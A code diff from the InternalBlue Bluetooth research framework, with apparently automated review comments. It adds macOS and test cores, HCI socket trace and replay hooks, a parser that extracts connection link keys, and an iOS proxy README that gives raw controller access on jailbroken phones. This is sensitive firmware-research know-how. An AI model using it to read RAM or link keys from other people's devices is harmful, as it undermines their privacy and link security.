#log.info("H4 Data received")
#log.info(received_data.encode('hex'))
(record_data, is_more) = self._getLatestH4Blob(new_data=received_data)
while record_data is not None:
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (hci.parse_hci_packet(record_data), 0, 0, 0, 0, 0)
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (hci.parse_hci_packet(record_data), 0, 0, 0, 0, 0) #TODO not sure if this causes trouble?
log.debug("Recv: " + str(record[0]))
log.debug("Recv: " + str(record[0]))
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues: # TODO filter_function not working with bluez modifications
try:
queue.put(record, block=False)
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues: # TODO filter_function not working with bluez modifications
try:
queue.put(record, block=False)
except Queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
# Check if the stackDumpReceiver has noticed that the chip crashed.
if self.stackDumpReceiver.stack_dump_has_happend:
# A stack dump has happend!
log.warn("recvThreadFunc: The controller send a stack dump. stopping..")
self.exit_requested = True
# Check if the stackDumpReceiver has noticed that the chip crashed.
if self.stackDumpReceiver.stack_dump_has_happend:
# A stack dump has happend!
log.warn("recvThreadFunc: The controller send a stack dump. stopping..")
self.exit_requested = True
(record_data, is_more) = self._getLatestH4Blob()
if not is_more:
break
log.debug("Receive Thread terminated.")
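Review bot: in `for queue, filter_function in self.registeredHciRecvQueues:` the loop variable shadows the `queue` module, so `except queue.Full:` looks `Full` up on a `Queue` instance and raises `AttributeError` the moment a receive queue is actually full, instead of dropping the packet as the `log.warn` intends (the old `except Queue.Full:` line had the same defect). Catch `queue2k.Full`, the alias this commit uses for `import queue`, or rename the loop variable to `q`. A second point in the stack-dump block: after `self.exit_requested = True` the inner `while record_data is not None:` loop keeps dispatching the remaining buffered blobs to every callback; a `break` right after setting the flag stops delivering packets from a controller that has just crashed.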
+192
View File
@@ -0,0 +1,192 @@
#!/usr/bin/env python2
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
import socket
import queue as queue2k
from . import hci
from pwn import *
from .core import InternalBlue
import binascii
import os
filepath = os.path.dirname(os.path.abspath(__file__))
class macOSCore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory=".", replay=False):
super(macOSCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory=".", replay=replay)
self.doublecheck = False
self.iobe = None
self.serial = None
if not replay:
import objc
objc.initFrameworkWrapper("IOBluetoothExtended",
frameworkIdentifier="de.tu-darmstadt.seemoo.IOBluetoothExtended",
frameworkPath=objc.pathForFramework(
filepath + "/../macos-framework/IOBluetoothExtended.framework"),
globals=globals())
self.hciport = -1
def device_list(self):
"""
Get a list of connected devices
"""
if self.exit_requested:
self.shutdown()
if self.running:
log.warn("Already running. Call shutdown() first!")
return []
# assume that a explicitly specified iPhone exists
device_list = [(self, "mac", "mac")]
return device_list
def local_connect(self):
if not self._setupSockets():
log.critical("No connection to target device.")
self._teardownSockets()
return True
def _setupSockets(self):
self.hciport = random.randint(60000, 65535-1)
log.debug("_setupSockets: Selected random ports snoop=%d and inject=%d" % (self.hciport, self.hciport + 1))
log.info("Wireshark configuration (on Loopback interface): udp.port == %d || udp.port == %d" % (self.hciport, self.hciport + 1))
# Create s_snoop socket
self.s_snoop = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s_snoop.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s_snoop.bind(('127.0.0.1', self.hciport))
self.s_snoop.settimeout(0.5)
self.s_snoop.setblocking(True)
# Create s_inject
self.s_inject = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s_inject.settimeout(0.5)
self.s_inject.setblocking(True)
# Create IOBluetoothExtended Object that listens for commands,
# sends them to the Bluetooth chip and replies via UDP socket.
if not self.replay:
self.iobe = IOBE.alloc().initWith_and_(str(self.hciport+1), str(self.hciport))
else:
self.iobe = None
time.sleep(0.5)
return True
def _recvThreadFunc(self):
log.debug("Receive Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# read record data
try:
data, addr = self.s_snoop.recvfrom(1024)
record_data = bytearray(data)
except socket.timeout:
continue # this is ok. just try again without error
if not self.exit_requested:
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (hci.parse_hci_packet(record_data), 0, 0, 0, 0, 0) #TODO not sure if this causes trouble?
log.debug("Recv: " + str(record[0]))
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues: # TODO filter_function not working with bluez modifications
try:
queue.put(record, block=False)
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..>" + record_data)
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
log.debug("Receive Thread terminated.")
def _sendThreadFunc(self):
log.debug("Send Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
h4type, data, queue, filter_function = task
# Prepend UART TYPE and length.
out = p8(h4type) + p8(len(data)) + data
# Send command to the chip using IOBluetoothExtended framework
h4type, data, queue, filter_function = task
data = bytearray(data)
opcode = format(data[1], '02x') + format(data[0], '02x')
log.debug("Sending command: 0x" + ''.join(format(x, '02x') for x in data) + ", opcode: " + opcode)
if not(h4type == 0x01 or h4type == 0x02):
log.warn("H4 Type {0} not supported by macOS Core!".format(str(h4type)))
if queue is not None:
queue.put(None)
continue
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Sending command
self.s_inject.sendto(out, ('127.0.0.1', self.hciport+1))
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
try:
record = recvQueue.get(timeout=10)
hcipkt = record[0]
data = hcipkt.data
except queue2k.Empty:
log.warn("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
continue
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
log.debug("Send Thread terminated.")
def _teardownSockets(self):
if self.s_inject is not None:
self.s_inject.close()
self.s_inject = None
if self.s_snoop is not None:
self.s_snoop.close()
self.s_snoop = None
return True
def shutdown(self):
if not self.replay:
self.iobe.shutdown()
self.s_inject.sendto(b'', ('127.0.0.1', self.s_snoop.getsockname()[1]))
super(macOSCore, self).shutdown()
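Review bot: `local_connect` returns `True` even when `_setupSockets` fails (`log.critical("No connection to target device.")`, then `self._teardownSockets()`, then `return True`), so the caller goes on to start the send and receive threads against closed sockets; return `False` in that branch. Further points in this file: the `super(macOSCore, self).__init__` call passes the literal `data_directory="."` instead of the `data_directory` argument, silently ignoring what the caller asked for; in `_recvThreadFunc` the loop variable `queue` shadows the module, so `except queue.Full:` raises `AttributeError` instead of catching, and `"dropping packets..>" + record_data` is `str + bytearray`, a `TypeError` on Python 3 (use the `bytes_to_hex` helper added in this commit); `h4type, data, queue, filter_function = task` is unpacked twice in `_sendThreadFunc`; and the shebang still says `python2`. Note also that both sockets are plain loopback UDP with no authentication: any local process that finds the random port in 60000..65534 can send H4 frames to `self.hciport+1`, where the IOBluetoothExtended object listens, or spoof responses to `self.hciport`. Acceptable for a research tool, but worth one sentence in the documentation.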
View File
@@ -0,0 +1,68 @@
from builtins import object
from pwnlib.util.packing import u32, u16, u8
class ConnectionInformation(object):
connection_handle = 0
connection_number = 0
master_of_connection = False
remote_name_address = 0
remote_address = None
id = None
public_rand = None
extended_lmp_feat = None
link_key = None
tx_pwr_lvl_dBm = 0
effective_key_len = 0
host_supported_feat = None
def __init__(self, connection_number, remote_address, remote_name_address, master_of_connection, connection_handle,
public_rand, effective_key_len, link_key, tx_pwr_lvl_dBm, extended_lmp_feat, host_supported_feat, id):
self.connection_number = connection_number
self.remote_address = remote_address
self.remote_name_address = remote_name_address
self.master_of_connection = master_of_connection
self.connection_handle = connection_handle
self.public_rand = public_rand
self.effective_key_len = effective_key_len
self.link_key = link_key
self.tx_pwr_lvl_dBm = tx_pwr_lvl_dBm
self.extended_lmp_feat = extended_lmp_feat
self.host_supported_feat = host_supported_feat
self.id = id
@staticmethod
def from_connection_buffer(connection):
# Possible TODO: Convert this to a Katai Struct parser with a proper .ksy grammar.
return ConnectionInformation(u32(connection[:4]), connection[0x28:0x2E][::-1],
u32(connection[0x4C:0x50]),
u32(connection[0x1C:0x20]) & 1 << 15 == 0,
u16(connection[0x64:0x66]),
connection[0x78:0x88],
u8(connection[0xa7:0xa8]),
connection[0x68:0x68 + u8(connection[0xa7:0xa8])],
u8(connection[0x9c:0x9d]) - 127,
connection[0x30:0x38], connection[0x38:0x40],
connection[0x0c:0x0d])
# For some reason the following doesn't work because some attributes like link_key end up as one element tuples
# connection_number = u32(connection[:4])
# remote_address = connection[0x28:0x2E][::-1],
# remote_name_address = u32(connection[0x4C:0x50])
# master_of_connection = u32(connection[0x1C:0x20]) & 1 << 15 == 0
# connection_handle = u16(connection[0x64:0x66])
# public_rand = connection[0x78:0x88]
# effective_key_len = u8(connection[0xa7:0xa8])
# link_key = connection[0x68:0x68 + effective_key_len],
# tx_pwr_lvl_dBm = u8(connection[0x9c:0x9d]) - 127,
# extended_lmp_feat = connection[0x30:0x38]
# host_supported_feat = connection[0x38:0x40]
# id = connection[0x0c:0x0d]
# return ConnectionInformation(connection_number, remote_address, remote_name_address, master_of_connection,
# connection_handle,
# public_rand, effective_key_len, link_key, tx_pwr_lvl_dBm, extended_lmp_feat,
# host_supported_feat, id)
def __getitem__(self, item):
# type: (str) -> Any
return vars(self)[item]
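Review bot: the commented-out readable version fails only because of the trailing commas on `remote_address = connection[0x28:0x2E][::-1],`, `link_key = connection[0x68:0x68 + effective_key_len],` and `tx_pwr_lvl_dBm = u8(connection[0x9c:0x9d]) - 127,`, which turn those three values into one-element tuples; drop the commas and keep that form rather than the positional call, where an argument-order slip is invisible (the constructor takes `connection_number` first and `id` last, and nothing checks that). Add a length check before parsing: the highest offset read is `0xa7`, so a truncated buffer from a flaky transport should raise a clear `ValueError` rather than fail inside the pwnlib unpackers. `id = connection[0x0c:0x0d]` keeps a one-byte slice where `u8(...)` would give the integer the other fields use. Since the object carries `link_key`, take care not to dump instances wholesale into logs.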
+39
View File
@@ -0,0 +1,39 @@
from builtins import object
class QueueElement(object):
index = 0
next_item = 0
prev = 0
capacity = 0
name = ''
queue_buf_start = 0
available_items = 0
item_size = 0
next_free_slot = 0
free_slots = 0
address = 0
waitlist_length = 0
next = 0
queue_buf_end = 0
thread_waitlist = 0
def __init__(self, index, address, item_size, capacity, available_items, free_slots, queue_buf_start, queue_buf_end,
next_item, next_free_slot, thread_waitlist, waitlist_length, next, prev, name):
self.index = index
self.next_item = next_item
self.prev = prev
self.capacity = capacity
self.name = name
self.queue_buf_start = queue_buf_start
self.available_items = available_items
self.item_size = item_size
self.next_free_slot = next_free_slot
self.free_slots = free_slots
self.address = address
self.waitlist_length = waitlist_length
self.next = next
self.queue_buf_end = queue_buf_end
self.thread_waitlist = thread_waitlist
def __getitem__(self, item):
# type: (str) -> Any
return vars(self)[item]
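Review bot: the `# type: (str) -> Any` comment on `__getitem__` refers to `Any` without a guarded `from typing import Any`, so type checkers report an undefined name; the socket hook module in this commit already uses the `try: from typing import ... except ImportError: pass` pattern, and the same applies to `ConnectionInformation`. Reuse it here.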
+307
View File
@@ -0,0 +1,307 @@
from __future__ import print_function
from builtins import object
import binascii
import time
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Dict, Type
except ImportError:
pass
class SocketRecvHook(object):
def __init__(self, socket):
# type: (socket.socket) -> None
self.snoop_socket = socket
self.replace = False
def recv_hook(self, data):
raise NotImplementedError("recv_hook not implemented")
def recv_replace(self, length, **kwargs):
raise NotImplementedError("recv_replace not implemented")
def recv(self, length, **kwargs):
if not self.replace:
data = self.snoop_socket.recv(length, **kwargs)
else:
data = self.recv_replace(length, **kwargs)
self.recv_hook(data)
return data
def recvfrom_replace(self, length, **kwargs):
raise NotImplementedError("recvfrom_replace not implemented")
def recvfrom_hook(self, data, addr):
raise NotImplementedError("recvfrom_hook not implemented")
def recvfrom(self, length, **kwargs):
# type: (int, Dict[str, Any]) -> Tuple[bytes, Any]
if not self.replace:
data, addr = self.snoop_socket.recvfrom(length)
else:
data, addr = self.recvfrom_replace(length, **kwargs)
self.recvfrom_hook(data, addr)
return data, addr
class SocketInjectHook(object):
def __init__(self, socket, core):
# type: (socket.socket, InternalBlue) -> None
self.inject_socket = socket
self.replace = False
self.core = core # type: InternalBlue
def close(self):
if self.inject_socket:
self.inject_socket.close()
def send(self, data):
self.send_hook(data)
if not self.replace:
try:
self.inject_socket.send(data)
except Exception as e:
self.send_exception(e)
self.core.test_failed = e
raise
else:
try:
self.send_replace(data)
except Exception as e:
self.core.test_failed = e
raise
def sendto(self, data, socket):
self.sendto_hook(data, socket)
if not self.replace:
try:
self.inject_socket.sendto(data, socket)
except Exception as e:
self.send_exception(e)
self.core.test_failed = e
raise
else:
try:
self.send_replace(data)
except Exception as e:
self.core.test_failed = e
raise
def getsockname(self):
return self.snoop_socket.getsockname()
def send_hook(self, result):
raise NotImplementedError("send_hook not implemented")
def sendto_hook(self, data, socket):
raise NotImplementedError("sendto_hook not implemented")
def send_replace(self, data):
raise NotImplementedError("send_replace not implemented")
def send_exception(self, e):
raise NotImplementedError("send_exception not implemented")
class SocketDuplexHook(SocketInjectHook, SocketRecvHook):
def __init__(self, snoop_socket, inject_socket, core, **kwargs):
# type: (socket.socket, socket.socket, InternalBlue, Dict[str, Any]) -> None
self.snoop_socket = snoop_socket
self.inject_socket = inject_socket
self.replace = False
self.core = core
pass
class HookBase(object):
def send_hook(self, data):
raise NotImplementedError
def recv_hook(self, data):
raise NotImplementedError
class TraceToFileHook(SocketDuplexHook):
def __init__(self, snoop_socket, inject_socket, core, filename='/tmp/bt_hci.log'):
# type: (socket.socket, socket.socket, InternalBlue, str) -> None
SocketDuplexHook.__init__(self, snoop_socket, inject_socket, core)
self.file = open(filename, 'a')
self.replace = False
self.log = []
self.closed = False
def recv_hook(self, data):
line = "RX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def send_hook(self, data):
line = "TX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def recvfrom_hook(self, data, socket, **kwargs):
line = "RX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def sendto_hook(self, data, socket, **kwargs):
line = "TX {}\n".format(binascii.hexlify(data))
print(line)
self.log.append(line)
def send_exception(self, e):
line = "EX '{}'\n".format(e)
print(line)
self.log.append(line)
def close(self):
if not self.closed:
self.inject_socket.close()
self.snoop_socket.close()
self.log.append("Socket closed\n")
self.file.writelines(self.log)
self.file.close()
self.closed = True
import socket
class PrintTrace(SocketDuplexHook):
def send_hook(self, data, **kwargs):
print("Sent: {}".format(binascii.hexlify(data)))
def recv_hook(self, data, **kwargs):
print("Recv: {}".format(binascii.hexlify(data)))
def recvfrom_hook(self, data, addr, **kwargs):
print("Recv: {}".format(binascii.hexlify(data)))
def sendto_hook(self, data, socket, **kwargs):
print("Sent: {}".format(binascii.hexlify(data)))
def send_exception(self, e):
print("Exception: {}".format(e))
class ReplaySocket(SocketDuplexHook):
def __init__(self, snoop_socket, inject_socket, core, filename='/tmp/bt_hci.log', debug=False):
SocketDuplexHook.__init__(self, snoop_socket, inject_socket, core)
self.replace = True
self.log = open(filename).readlines()
self.index = 0
self.debug = debug
if self.log[0].startswith("#"):
self.index = 1
def send_hook(self, data, **kwargs):
if self.debug:
print("Sent: {}".format(binascii.hexlify(data)))
def recv_hook(self, data, **kwargs):
if self.debug:
print("Recv: {}".format(binascii.hexlify(data)))
def recvfrom_hook(self, data, addr, **kwargs):
if self.debug:
print("Recv: {}".format(binascii.hexlify(data)))
def sendto_hook(self, data, socket, **kwargs):
if self.debug:
print("Sent: {}".format(binascii.hexlify(data)))
def send_exception(self, e):
if self.debug:
print("Exception: {}".format(e))
def send_replace(self, data, **kwargs):
encoded_data = "" # type: str
hex_data = binascii.hexlify(data)
direction, encoded_data = self.log[self.index].split(" ", 1)
if direction == "RX":
# Some recieves aren't handled yet, wait a bit so the recv thread takes care of them.
time.sleep(0.2)
direction, encoded_data = self.log[self.index].split(" ", 1)
assert (direction == "TX")
log_data = binascii.unhexlify(encoded_data.rstrip('\n'))
assert data == log_data, "Got {}, expected {}".format(hex_data, encoded_data)
self.index += 1
ty, data = self.log[self.index].split(" ", 1)
if ty == "EX":
self.index += 1
raise socket.error(data)
def recv_replace(self, length, **kwargs):
time.sleep(0.001)
direction, encoded_data = self.log[self.index].split(" ", 1)
if direction == "RX":
self.index += 1
return binascii.unhexlify(encoded_data.rstrip('\n'))
else:
raise socket.timeout()
def recvfrom_replace(self, length, **kwargs):
time.sleep(0.001)
direction, encoded_data = self.log[self.index].split(" ", 1)
if direction == "RX":
self.index += 1
return binascii.unhexlify(encoded_data.rstrip('\n')), 1234
else:
raise socket.timeout()
def getsockname(self):
return (None, 0)
def close(self):
assert self.index + 1 == len(self.log)
from internalblue.core import InternalBlue
def hook(core, socket_hook, **hookkwargs):
# type: (Type[InternalBlue], Type[SocketDuplexHook], Any) -> None
def wrap_socket_setup(orig_func):
def wrapped_socket_setup(self, *args, **kwargs):
if not self.replay:
status = orig_func(self, *args, **kwargs)
else:
status = True
h = socket_hook(self.s_snoop, self.s_inject, core=self, **hookkwargs)
self.s_inject = h
self.s_snoop = h
return status
return wrapped_socket_setup
core._setupSockets = wrap_socket_setup(core._setupSockets)
def wrap_teardown_sockets(orig_func):
def wrapped_teardown_sockets(self, *args, **kwargs):
if not self.replay:
return orig_func(self, *args, **kwargs)
else:
self.s_inject.close()
self.s_snoop.close()
return wrapped_teardown_sockets
core._teardownSockets = wrap_teardown_sockets(core._teardownSockets)
def wrap_device_list(orig_func):
def wrapped_device_list(self, *args, **kwargs):
if not self.replay:
return orig_func(self, *args, **kwargs)
else:
return [(self, "ReplayDevice", "ReplayDevice")]
return wrapped_device_list
core.device_list = wrap_device_list(core.device_list)
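Review bot: every trace line is built with `"RX {}\n".format(binascii.hexlify(data))`; on Python 3 `hexlify` returns `bytes`, so the file records `RX b'0401...'` and `ReplaySocket.recv_replace` then fails in `binascii.unhexlify(encoded_data.rstrip('\n'))` on the `b'` prefix, and the `assert data == log_data` in `send_replace` can never hold for a trace written under Python 3. Decode once (`binascii.hexlify(data).decode('ascii')`) or use the `bytes_to_hex` helper added in this commit, in both `TraceToFileHook` and `PrintTrace`. Other points: `TraceToFileHook` appends to the fixed path `/tmp/bt_hci.log` in a world-writable directory, and the traces are raw HCI traffic including vendor memory reads, so default to a file under the core's `data_directory` or a `tempfile.mkstemp` name; `SocketInjectHook.getsockname` returns `self.snoop_socket.getsockname()` but only `SocketDuplexHook` sets `snoop_socket`; `hook()` replaces `_setupSockets`, `_teardownSockets` and `device_list` on the class, so the hook applies to every instance of that core for the rest of the process, which is fine for tests but should be documented; and the stray `import socket` in the middle of the file belongs at the top with the other imports.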
+163
View File
@@ -0,0 +1,163 @@
#!/usr/bin/env python2
from __future__ import print_function
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
import socket
import queue as queue2k
from . import hci
from pwn import *
from .core import InternalBlue
import binascii
filepath = os.path.dirname(os.path.abspath(__file__))
try:
import typing
from typing import List, Tuple, Any
from internalblue.core import InternalBlue
except:
pass
class testCore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
super(testCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory=".")
file = open(filepath+'/../dummymemdump.bin', mode='rb')
self.memory = file.read()
file.close()
self.doublecheck = False
def device_list(self):
# type: () -> List[Tuple[InternalBlue,str,str]]
"""
Get a list of connected devices
"""
if self.exit_requested:
self.shutdown()
if self.running:
log.warn("Already running. Call shutdown() first!")
return []
# assume that a explicitly specified iPhone exists
device_list = [(self, "Testchip", "Testchip")]
return device_list
def sendH4(self, h4type, data, timeout=2):
"""
Send an arbitrary HCI packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
or the timeout expires. The return value is the Payload of the
HCI Command Complete Event which was received in response to
the command or None if no response was received within the timeout.
"""
queue = queue2k.Queue(1)
try:
self.sendQueue.put((h4type, data, queue, None), timeout=timeout)
ret = queue.get(timeout=timeout)
return ret
except queue2k.Empty:
log.warn("sendH4: waiting for response timed out!")
return None
except queue.Full:
log.warn("sendH4: send queue is full!")
return None
def local_connect(self):
return True
def _setupSockets(self):
self.hciport = random.randint(60000, 65535 - 1)
log.debug("_setupSockets: Selected random ports snoop=%d and inject=%d" % (self.hciport, self.hciport + 1))
log.info("Wireshark configuration (on Loopback interface): udp.port == %d || udp.port == %d" % (
self.hciport, self.hciport + 1))
# Create s_snoop socket
self.s_snoop = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_snoop.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s_snoop.bind(('127.0.0.1', self.hciport))
self.s_snoop.settimeout(0.5)
self.s_snoop.setblocking(True)
# Create s_inject
self.s_inject = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_inject.settimeout(0.5)
self.s_inject.setblocking(True)
time.sleep(1.5)
return True
def _recvThreadFunc(self):
log.debug("Receive Thread terminated.")
def _sendThreadFunc(self):
log.debug("Send Thread started.")
while not self.exit_requested:
# Little bit ugly: need to re-apply changes to the global context to the thread-copy
context.log_level = self.log_level
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
h4type, data, queue, filter_function = task
# Prepend UART TYPE and length.
out = p8(h4type) + p8(len(data)) + data
# Send command to the chip using IOBluetoothExtended framework
h4type, data, queue, filter_function = task
opcode = binascii.hexlify(data[1]) + binascii.hexlify(data[0])
log.debug("Sending command: 0x" + binascii.hexlify(data))
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
# Return responses according to the opcode & operands
if opcode == '1001':
record_data = '040E0C0101100006b415060f000e22'.decode('hex')
data = hci.parse_hci_packet(record_data).data
elif opcode == 'fc4d':
length = int(binascii.hexlify(data[7]), 16)
address = int(binascii.hexlify(data[6]+data[5]+data[4]+data[3]), 16)
data = '014dfc00'.decode('hex') + self.memory[address:address+length]
elif opcode == 'fc4c':
log.info(data.encode('hex'))
length = int(binascii.hexlify(data[2]), 16)
address = int(binascii.hexlify(data[6]+data[5]+data[4]+data[3]), 16)
self.memory = self.memory[:address] + data[7:len(data)] + self.memory[address+length:]
else:
print(opcode)
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
log.debug("Send Thread terminated.")
def enableBroadcomDiagnosticLogging(self, enable):
return
def _teardownSockets(self):
return True
def shutdown(self):
return True
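Review bot: `'040E0C0101100006b415060f000e22'.decode('hex')`, `'014dfc00'.decode('hex')` and `log.info(data.encode('hex'))` are Python 2 only (the `hex` codec on `str.decode`/`bytes.encode` is gone in 3); use `bytearray.fromhex(...)` and `bytes_to_hex(...)` as the rest of this commit does. `binascii.hexlify(data[1])` breaks too, because indexing `bytes` yields an `int` on Python 3; slice instead (`data[1:2]`). The `fc4c` (Write_RAM) emulation has a logic error as well: `length = int(binascii.hexlify(data[2]), 16)` is the HCI parameter length, which covers the 4-byte address plus the payload, but only `data[7:len(data)]` (the payload, `length - 4` bytes) is spliced back in, so `self.memory` shrinks by four bytes on every write and every later address is shifted; use `length = len(data) - 7`. Finally, `except queue.Full:` in `sendH4` refers to the local `Queue` instance named `queue`, not the module; `queue2k.Full` is what is meant.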
+3
View File
@@ -0,0 +1,3 @@
def bytes_to_hex(bytes):
# type: (bytearray) -> str
return ''.join(format(x, '02x') for x in bytearray(bytes))
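Review bot: the parameter is named `bytes`, which shadows the builtin inside the function (harmless here, but confusing next to the `bytearray(bytes)` call); rename it to `data`. `binascii.hexlify(data).decode('ascii')` returns the same `str` on both interpreters and avoids a per-byte `format` join on large memory dumps. Either way, a one-line docstring stating that the result is a `str` on Python 3 would help, since that distinction is the reason this helper exists.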
+24 -6
View File
@@ -1,5 +1,9 @@
# internalblue-ios-proxy
This project is a proxy that redirects iOS's bluetooth socket and exposes it as a TCP socket which can be used to send HCI commands to the bluetooth controller of the device. A jailbroken device is required. To compile the project, a Mac with xcode is required.
This project is a proxy that redirects the *iOS* Bluetooth socket and exposes it as a
TCP socket which can be used to send HCI commands to the Bluetooth controller of the device.
A jailbroken device is required. To compile the project, a Mac with xcode is required.
The precompiled `ios-proxy` binary was tested on the iPhone 6 (12.1.2, 12.4), iPhone SE (12.4),
iPhone 7 (12.1.2, 12.4), and iPhone X (12.4).
## Building internalblue-ios-proxy
Open the project with xcode and compile it. Xcode will create a single binary that can then be transferred onto the device.
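Review bot: `xcode` in the rewritten sentence versus `Xcode` in the build section below; use the product name consistently.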
@@ -7,14 +11,28 @@ Open the project with xcode and compile it. Xcode will create a single binary th
## Installing internalblue-ios-proxy
1. Right-click the `internalblue-ios-proxy` binary and click "Show in Finder". This will open the location the compiled binary resides in.
2. Move the binary onto the device (e.g. with scp) at a location where applications are allowed to be executed (e.g. `/bin` or `/sbin`).
3. The binary needs the `platform-application` entitlement. This is achieved by signing the binary with the included `entitlements.xml` file. Sign it using `ldid -Sentitlements.xml internalblue-ios-proxy`. `ldid` should be on a jailbroken device with Cydia by default.
3. The binary needs the `platform-application` entitlement. This is achieved by signing the binary with the included `entitlements.xml` file.
Sign it using `ldid -Sentitlements.xml internalblue-ios-proxy`. `ldid` should be on a jailbroken device with Cydia by default.
If `ldid` was not installed with your jailbreak, try opening [sileo://package/ldid](sileo://package/ldid).
## Running internalblue-ios-proxy
Run the proxy by executing `internalblue-ios-proxy <port-number>`. The phone will then listen on this port and can be accessed either when on the same WiFi or by proxying the port through USB (using [usbmuxd](https://iphonedevwiki.net/index.php/SSH_Over_USB)).
Run the proxy by executing `internalblue-ios-proxy <port-number>`.
The phone will then listen on this port and can be accessed either when on the same Wi-Fi or
by proxying the port through USB (using [usbmuxd](https://iphonedevwiki.net/index.php/SSH_Over_USB)).
When enabling a personal hotspot, you can also run `dhclient` on *Linux* on the new local ethernet interface.
A few things to note:
- to increase reliability of the proxy, bluetooth should be disabled (either by manually stopping the bluetoothd daemon or by shutting of bluetooth in the settings on the phone)
- in case the bluetooth chip crashes or does not respond anymore over the proxy, the proxy should be stopped and bluetooth should be turned off and on again in the UI
- sometimes the bluetooth socket will not respond anymore after establishing a second connection, just restart the proxy then.
- To increase reliability of the proxy, *Bluetooth should be disabled*
(either by manually stopping the Bluetooth daemon or by shutting of Bluetooth in the
settings on the phone). Despite shutting down Bluetooth, the RAM will still have the same contents
as during previous usage, and you can analyze it.
- The current implementation sometimes returns wrong results, thus we double-check results of
commands that read ROM/RAM. We show warnings, but firmware dumps should complete nonetheless.
- To get sufficient performance, access the `ios-proxy` over USB and not using Wi-Fi.
- In case the Bluetooth chip crashes or does not respond anymore over the proxy,
the proxy should be stopped and Bluetooth should be turned off and on again in the UI.
- Sometimes the Bluetooth socket will not respond anymore after establishing a second connection,
just restart the proxy then.
This project is based on Brandon Azad's [iOS command line tool](https://github.com/bazad/ios-command-line-tool) template.
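Review bot: `shutting of Bluetooth` should read `shutting off Bluetooth`. More importantly, the running instructions recommend reaching the proxy over Wi-Fi without saying that it accepts any TCP client with no authentication: whoever can reach `<port-number>` gets raw HCI access to the controller, including the vendor RAM read and write commands the tool relies on, and the same section notes that RAM keeps its previous contents after Bluetooth is switched off. The "access over USB for performance" bullet should say "use USB (usbmuxd) and do not expose the port on a shared network", with Wi-Fi as an explicit opt-in.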
@@ -50,7 +50,7 @@ int connect_bt_device() {
struct termios term;
if (socket_fd == 0) {
printf("unable to get bluetooth socket\n");
printf("[!] Unable to get Bluetooth socket\n");
return -1;
}
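Review bot: `if (socket_fd == 0)` never detects the failure it is meant to catch: `socket()` returns -1 on error, and 0 only when descriptor 0 happens to be free (for instance when stdin was closed), in which case this check rejects a valid socket. Test `socket_fd < 0`, as `create_server` already does for `server_fd`.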
@@ -58,8 +58,8 @@ int connect_bt_device() {
ctl_inf->ctl_id = 0;
strcpy(ctl_inf->ctl_name, "com.apple.uart.bluetooth");
if ((error = ioctl(socket_fd, CTLIOCGINFO, ctl_inf))) {
printf("ioctl(CTLIOCGINFO) = %d - errno: %d\n", error, errno);
printf("error: %s\n", strerror(errno));
printf("[!] ioctl(CTLIOCGINFO) = %d - errno: %d\n", error, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
